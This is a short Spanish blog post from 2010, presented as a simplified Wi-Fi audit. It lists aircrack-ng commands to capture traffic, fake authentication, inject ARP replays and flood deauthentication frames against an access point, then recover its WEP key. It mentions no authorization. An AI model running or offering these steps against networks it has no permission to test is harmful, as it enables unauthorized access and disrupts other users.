domingo, 18 de julio de 2010

Auditoria de redes inalámbricas (simplificado)

Auditoria simplificada 

Primero anotar la siguiente información:

  • canal del AP
  • nombre del AP
  • Dirección MAC del AP

En la consola teclear los siguientes comandos:

#airodump-ng -w [nombre captura??] -c12 wlan0

en donde -c12 corresponde al número del canal y wlan0 al tipo de antena que se está utilizando (alfa network 1). Para otros casos, puede ser ath0 cuando se utiliza, por ejemplo, una tarjeta PCMCIA.

Luego proceder a abrir otras consolas y teclear los siguientes comandos ... todavía sin teclear enter.

#aireplay-ng wlan0 --fakeauth 135 -e [nombre AP] -a [MAC AP] -h [mi MAC]

#aireplay-ng wlan0 --arpreplay -e [nombre AP] -b [MAC AP] -h [mi MAC] -x 1000

#aireplay-ng wlan0 --deauth 0 -e [nombre AP] -a [MAC AP] -h [mi MAC]

Finalmente presionamos a todas enter y listo. A capturar IVs cuando sea posible.

Para obtener la clave:

#aircrack-ptw nombre captura??.cap

esperamos un rato y

key found!

 

Tags